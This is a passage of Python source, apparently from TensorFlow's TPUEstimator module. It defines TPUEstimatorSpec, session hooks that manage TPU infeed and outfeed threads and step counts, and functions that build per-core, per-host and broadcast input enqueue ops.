_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
if ops.get_to_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Use tf.contrib.summary inside of host_calls.')
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather then a constant, is to allow
TPUEstimator adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1-th TPU execution: iterations_per_loop = 4
- 2-th TPU execution: iterations_per_loop = 4
- 3-th TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multi iterations_per_loop variables were found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are ususally too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
logging.info(msg, *args, **kw)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(ops.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
# MeshTensorFlow since it places variables on TPU directly. Reinitialize tpu
# is causing the variable corruption since the previous allocated memory
# might be overwritten for other purpose.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
logging.info('Init TPU system')
start = time.time()
with ops.Graph().as_default():
with tf_session.Session(
self._master, config=self._session_config) as sess:
sess.run(
tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
iterations_per_loop_counter: A namedtuple of [`value',`unit`] that
represents the number of 'iterations count' or 'time in seconds' to run
optimizer per loop, based on the `unit` specified, `count` or `seconds`
respectively.
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError(
'Only `count` or `seconds` are accepted as the '
'`iterations_per_loop_counter.unit')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations are computed by choosing the smaller of the (`final step` -
`global step`), and the initial estimated iterations returned by the
estimator (by default is 1).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
logging.info("ElapsedTime: %.3f", elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=ctx.num_of_replicas_per_host)
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
num_replicas_per_host = ctx.num_of_replicas_per_host
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
# This avoids inconsistent state among different model replcias.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
enqueue_datas_list.append(enqueue_data)
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(replica_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=replica_id)
else:
return replica_id % num_replicas_per_host
def device_function_impl(replica_id):
return ctx.tpu_host_placement_function(replica_id=replica_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
array_ops.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# for each core, slice out the flattened_inputs for each core.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
